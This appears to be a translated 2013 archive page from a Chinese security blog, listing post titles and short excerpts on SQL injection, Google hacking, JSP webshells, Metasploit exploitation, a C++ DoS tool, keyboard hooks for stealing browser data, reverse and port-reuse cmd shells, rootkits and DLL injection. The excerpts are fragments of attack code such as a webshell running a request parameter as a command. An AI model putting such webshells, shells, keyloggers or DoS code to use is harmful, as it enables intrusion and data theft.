Original: Oracle sql injection

First create an ordinary user and grant it privileges:C:\>sqlplus "/as sysdba"SQL*Plus: Release 10.2.0.1.0 - Production on 星期三 7月 31 21:49:45 2013Copyright (c) 1982, 2005, Oracle. All rights reserved.连接到:Personal Oracle Database 1

2013-07-31 22:52:58 1277

Original: mysql sql injection

Version:mysql> SELECT @@version;+------------------+| @@version |+------------------+| 5.0.96-community | +------------------+1 row in set (0.00 sec)Comments:mysql> SELECT 1; #com

2013-07-30 23:20:52 907

Original: Installing and starting MySQL on Linux

The files I downloaded are MySQL-client-5.0.96-1.glibc23.i386.rpm  MySQL-server-5.0.96-1.glibc23.i386.rpm  MySQL-shared-5.0.96-1.glibc23.i386.rpm. First install MySQL-shared-5.0.96-1.glibc23.i386.rpm:[root@localhost m

2013-07-30 22:58:14 870

Reposted: Back Orifice 2000

http://en.wikipedia.org/wiki/Back_Orifice_2000 Back Orifice 2000 (often shortened to BO2k) is a computer program designed for remote system administration. It enables a user to control a co

2013-07-29 08:25:21 1240

Reposted: Agobot

http://en.wikipedia.org/wiki/Agobot Agobot, also frequently known as Gaobot, is a family of computer worms. Axel "Ago" Gembe, a German programmer, was responsible for writing the first vers

2013-07-29 08:19:06 999 1

Reposted: Google hacker intrusion methods

http://baike.baidu.com/view/433742.htm route print: view this machine's network settings. intext: uses a string in the body text of a web page as the search condition. For example, entering intext:动网 in Google returns every page whose body text contains "动网". allintext: used in the same way as intext. intitle: like the int

2013-07-28 15:08:49 1678

Reposted: Google Hacking

http://home.ubalt.edu/abento/753/footscan/googlehacking.html This is an introduction to the use of the Google search tools for obtaining information about organizations, servers, vulnerabilities,

2013-07-28 14:08:40 1175

Original: webshell, the complex JSP version

A version downloaded from http://i8jesus.com/?page_id=205, thanks to the author. pwn.jsp:<%!String currentDir = "";PageContext context;HttpSession currentSession;%><%if ( session.getAttribute("pwd") == nu

2013-07-27 23:13:34 3622

Original: webshell, the simple JSP version

Copied from BT5 with minor modifications:<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>cmdjsp<% String cmd = request.getParameter("cmd"); String output = "

2013-07-27 23:09:12 5882

Reposted: XSS Filter Evasion Cheat Sheet

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet XSS Filter Evasion Cheat Sheet. Contents: 1 Introduction 2 Tests 2.1 XSS Locator 2.2 XSS

2013-07-27 17:43:04 2220

Original: metasploit db_autopwn in practice

msf > db_nmap -O 192.168.1.142[*] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2013-05-14 20:12 EDT[*] Nmap: Nmap scan report for 192.168.1.142[*] Nmap: Host is up (0.00047s latency).[*] Nma

2013-07-27 00:03:38 5660 1

Original: exploit/windows/smb/ms08_067_netapi

msf > use exploit/windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) > show payloadsCompatible Payloads=================== Name Disclosure Dat

2013-07-26 23:52:59 3912

Original: metasploit hosts

BT5R1:msf > hosts -hUsage: hosts [ options ] [addr1 addr2 ...]OPTIONS: -a,--add Add the hosts instead of searching -d,--delete Delete the hosts instead of searching -c On

2013-07-26 23:18:36 1576

Original: metasploit db_nmap

BT5R1:msf > db_nmap -h[*] Nmap: Nmap 5.51SVN ( http://nmap.org )[*] Nmap: Usage: nmap [Scan Type(s)] [Options] {target specification}[*] Nmap: TARGET SPECIFICATION:[*] Nmap: Can pass hostnames,

2013-07-26 23:15:52 5404

Original: metasploit db_autopwn

BT5R1:msf > db_autopwn -h[*] Usage: db_autopwn [options] -h Display this help text -t Show all matching exploit modules -x Select modules based on

2013-07-26 23:11:50 1301

Reposted: Easy Pentesting: Metasploit's db_autopwn

http://allanfeid.com/content/easy-pentesting-metasploits-dbautopwn Everyday, life gets easier for script kiddies. These days everything is pretty much automated. I came across the db_autopwn

2013-07-26 23:02:10 970

Original: Input method hook

Split into one DLL project and one empty Win32 project. Create a new empty DLL project using the multi-byte character set. The source code follows. shurufa.h:#ifndef SHURUFA_H#define SHURUFA_H#include #include #include #include #pragma comment(lib,"Imm32.lib")extern "C" void writ

2013-07-25 22:47:23 1299

Original: C++ denial-of-service attack (DoS)

#include #include #include #pragma comment(lib,"ws2_32.lib")#define SEQ 0x28376839int threadnum, maxthread, port;char *DestIP; // target IPvoid display(void) // define the status display function { static int play = 0;//

2013-07-24 22:56:17 1053

Original: C++ single-threaded TCP scanner

#include #include #include #pragma comment(lib,"ws2_32.lib")clock_t start, end;float costtime;void usage() { printf("\tusage: tcpscan RemoteIP StartPort-EndPort\n"); printf("\tExample: tcpsca

2013-07-24 22:33:27 981

Original: C++ getting the host IP address

#include#include#pragma comment(lib,"ws2_32.lib")void RetrieveIP(){ WSADATA wsaData; char name[255]; char *ip; // IP address variable PHOSTENT hostinfo; if (WSAStartup(MAKEWORD(2, 2), &wsaData) == 0) {

2013-07-24 22:16:26 928

Original: C++ getting host information

#include #include #include #include #define BUF_SIZE 1024// get CPU informationvoid GetCPUInfo() { TCHAR CPU[BUF_SIZE]; SYSTEM_INFO systeminfo; // get the CPU model GetSystemInfo(&systeminfo); switch (system

2013-07-24 22:05:37 1633

Original: C++ killing a process

Source code:#include #include #include #include #pragma comment(lib,"kernel32.lib")#pragma comment(lib,"advapi32.lib")void EnableDebugPriv() { HANDLE hToken; TOKEN_PRIVILEGES tkp; OpenProcessToken(

2013-07-24 08:38:33 9625 2

Original: C++ shutdown program

Source code:#include#includeint main() { HANDLE hToken; TOKEN_PRIVILEGES tkp;// get the OS version OSVERSIONINFO osvi; osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); if (GetVersionEx(&osvi) == 0) return 0

2013-07-24 08:30:40 4393 1

Original: C++ downloading a file

#include #include #pragma comment(lib,"Urlmon")void main() { HRESULT urldown; urldown = URLDownloadToFile(NULL, L"http://www.exploit-db.com/download/26703/", L"c:\\26703.py", 0, NULL); switch

2013-07-23 23:59:56 1455 1

Original: Keyboard hook

keyboard_hook.h:#ifndef KEYBOARD_HOOK_H#define KEYBOARD_HOOK_H#include extern "C" void __declspec(dllexport) SetKbHook();extern "C" void __declspec(dllexport) RemoveKbHook();#endifkeyboard

2013-07-23 23:21:02 646

Original: C++ hook technique for stealing IE data

First build the DLL. ktr.h code:#ifndef KTR_H#define KTR_H#include extern "C" void __declspec(dllexport) SetKbHook();extern "C" void __declspec(dllexport) RemoveKbHook();#endifktr.cpp:#include "ktr.h"#i

2013-07-23 21:54:25 1663

Original: Port reuse to open a cmd shell

The port to reuse is Tomcat's default HTTP port 8080. Source code:#include #pragma comment(lib, "ws2_32.lib")#define LISTEN_PORT 8080int main() { WSADATA ws; SOCKET listenFD; WSAStartup(MAKEWORD(2, 2), &ws); listenFD = WSA

2013-07-22 23:15:43 821

Original: Reverse connection to open a cmd shell

Source code:#include #include #pragma comment(lib,"Ws2_32") #define LISTEN_PORT 9090int main() { WSADATA ws; SOCKET listenFD; int ret; WSAStartup(MAKEWORD(2, 2), &ws); listenFD = WSASocket(AF_IN

2013-07-22 22:22:13 1084

Original: Dual pipes to open a cmd shell

The source code follows:#include #include #include #pragma comment(lib,"Ws2_32") #define SZBUFFER_SIZE 1024#define LST_PORT 9090SOCKET InitializeServer(VOID) { WORD version = MAKEWORD(2, 2); WSADATA wsaDat

2013-07-21 23:41:10 1068

Reposted: Process communication (2): pipe techniques, part 2, anonymous pipes

http://blog.csdn.net/morewindows/article/details/7390441 A pipe in a computer is like a water pipe in the real world: water put in at one end flows out the other. In a computer the flow of water is naturally replaced by a stream of data. Pipes in a computer are divided into anonymous pipes and named pipes; this article mainly covers using anonymous pipes to accomplish the task of redirecting output, leaving named pipes to the next article. First let's look at how to create and use anonymous

2013-07-21 18:09:52 691

Reposted: Ring 0f Fire : Rootkits and DKOM

http://fluxius.handgrep.se/2011/01/02/ring-0f-fire-rootkits-and-dkom/ Many books and papers cover the subject of Rootkits. I wrote this article to describe my first steps. Here, you will l

2013-07-21 14:54:22 2157

Original: Loading the first rootkit

The source code follows, mydriver.c:#include "ntddk.h"VOID CleanUp(IN PDRIVER_OBJECT pDriverObject);NTSTATUS DriverEntry(IN PDRIVER_OBJECT TheDriverObject, IN PUNICODE_STRING TheRegistryPath){ DbgPrint("This is my

2013-07-21 14:43:02 1290 2

Original: Setting up a Windows driver development environment

Download the WDK; I downloaded it from http://www.microsoft.com/en-us/download/details.aspx?id=11800, version 7.1.0. Download VisualDDK from http://visualddk.sysprogs.org/download/. Install the WDK first, then VisualDDK; just click Next through both, with no special settings. After installation,

2013-07-20 23:43:43 817

Reposted: Windows XP driver development (3): the difference between DDK and WDK/WDM

http://blog.csdn.net/chenyujing1234/article/details/7565429 Recently I have been trying to learn about driver development on WINDOWS, so here is a summary of the material I have read lately.  1. First, starting from the basics: developing a driver for WINDOWS requires a dedicated development kit, just as developing a JAVA program may require a JDK, and developing a WINDOWS application requires the WINDOWS

2013-07-20 21:57:17 1129

Original: DLL injection into notepad.exe

Create a new DLL project, but do not choose an empty project, so that some simple .h and .cpp files are generated automatically; in my case stdafx.h, targetver.h, dllmain.cpp, simple_dll.cpp and stdafx.cpp were generated. Modify dllmain.cpp to:// dllmain.cpp : defines the entry point for the DLL application.#include "stdafx.h"#include

2013-07-20 21:42:48 3921 1

Original: DLL injection

The source code follows:#include #include #include #include DWORD GetTargetProcessID(const char *processExeName){ if (processExeName == NULL) { return FALSE; } HANDLE hSnapshot; hSnapshot = CreateToolhe

2013-07-20 18:09:17 985

Original: Creating and calling a dynamic link library in VS2010

First create a new DLL project: then create dll.h and dll.cpp. dll.h:#ifndef DLL_H#define DLL_Hextern "C" int __declspec(dllexport)add(int a, int b);#endifdll.cpp:#include "dll.h"int add(int a, int b){

2013-07-20 15:37:47 757

Original: Creating and calling a static library in VS2010

First create the static library project: this creates the static library project. Then create the .h and .cpp files. static.h:#ifndef STATIC_H#define STATIC_Hextern "C" int add(int a, int b);#endifstatic.cpp:#include "static.h"int add

2013-07-20 15:06:07 1340

Original: Installing, uninstalling and running a Windows service in C++

Re-implemented according to my own understanding; the code follows:#include #include #include #define SERVICE_NAME TEXT("system2")SERVICE_STATUS g_status;SERVICE_STATUS_HANDLE g_ServiceStatusHandle;BOOL InstallService() { SC_HANDLE hS

2013-07-19 22:04:54 5353 1

Original: Creating, installing and starting a Windows service

The code follows:#include #include #include #include // service name; if the service is of type SERVICE_WIN32_OWN_PROCESS, the service name is ignored#define SERVICE_NAME "MyService"// service entry functionvoid WINAPI MyServiceMain(DWORD argc, LPTSTR *ar

2013-07-19 21:21:49 1158
